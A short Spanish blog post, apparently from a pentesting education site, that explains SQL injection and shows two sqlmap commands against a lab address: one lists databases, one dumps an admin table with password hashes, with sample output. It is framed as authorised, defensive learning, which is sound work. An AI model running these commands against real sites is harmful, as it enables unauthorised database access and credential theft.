~ / blog / pentesting
KALI

Sql injection con sqlmap

La inyección SQL sigue siendo una de las vulnerabilidades más peligrosas: deja leer, y a veces escribir, en toda la base de datos.

sqlmap la automatiza. Le das la URL con el parámetro sospechoso y detecta si es inyectable.

Con menos menos dbs lista las bases de datos, y con dump vuelca las tablas, incluidas las de usuarios y contraseñas. Una sola URL mal programada puede entregar toda la base.

Solo con permiso.

# los comandos

kali@kali:~$ sqlmap -u 'http://10.0.0.5/item?id=1' --batch --dbscopiar
[*] parameter 'id' is vulnerable (boolean-based blind)
available databases: information_schema, tienda, usuarios
kali@kali:~$ sqlmap -u 'http://10.0.0.5/item?id=1' -D usuarios -T admin --dumpcopiar
| id | user | password (hash) |
| 1 | admin | 5f4dcc3b5aa765d61d...
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.